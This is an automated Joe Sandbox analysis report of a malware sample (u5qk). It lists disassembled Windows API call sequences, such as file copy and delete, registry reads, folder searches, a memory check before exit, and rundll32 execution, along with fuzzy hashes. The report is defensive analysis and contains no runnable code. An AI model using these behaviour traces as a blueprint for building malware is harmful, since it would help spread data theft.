                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                      • String ID: X@
                                                                                                                                                                                                                                      • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                      • Opcode ID: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
                                                                                                                                                                                                                                      • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00411307
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
                                                                                                                                                                                                                                      • String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
                                                                                                                                                                                                                                      • API String ID: 672783590-3078973353
                                                                                                                                                                                                                                      • Opcode ID: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
                                                                                                                                                                                                                                      • Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04076B10), ref: 0041244B
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0406FB08), ref: 004124B7
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04077350), ref: 004124DF
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                        • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                        • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                        • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                        • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 167551676-0
                                                                                                                                                                                                                                      • Opcode ID: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
                                                                                                                                                                                                                                      • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                      • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                      • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6BA6C947
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BA6C969
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6BA6C9A9
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BA6C9C8
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BA6C9E2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4191843772-0
                                                                                                                                                                                                                                      • Opcode ID: 341fe4c0c2de812b14e32742004722da435217855940b3b3dac0fa7b61a88c72
                                                                                                                                                                                                                                      • Instruction ID: ce47970c0cc3163c536d3795196afd30da5ac0cb2faedac466f2c1604ba601bb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341fe4c0c2de812b14e32742004722da435217855940b3b3dac0fa7b61a88c72
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 382129726447146BDF059A38CC84BAE73B9FB86740F90411EF942A7680FB34DC8187A0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,040707F8), ref: 004129EB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                        • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                        • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                      • String ID: L0A
                                                                                                                                                                                                                                      • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                      • Opcode ID: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
                                                                                                                                                                                                                                      • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                                                                      • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                      • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,04072828,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,04077410,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                                                                      • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                      • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,040727F0,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,04076780,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                                                                      • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                      • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(04070908,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(04077270,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(04070908,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                      • API String ID: 2929475105-3463377506
                                                                                                                                                                                                                                      • Opcode ID: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
                                                                                                                                                                                                                                      • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
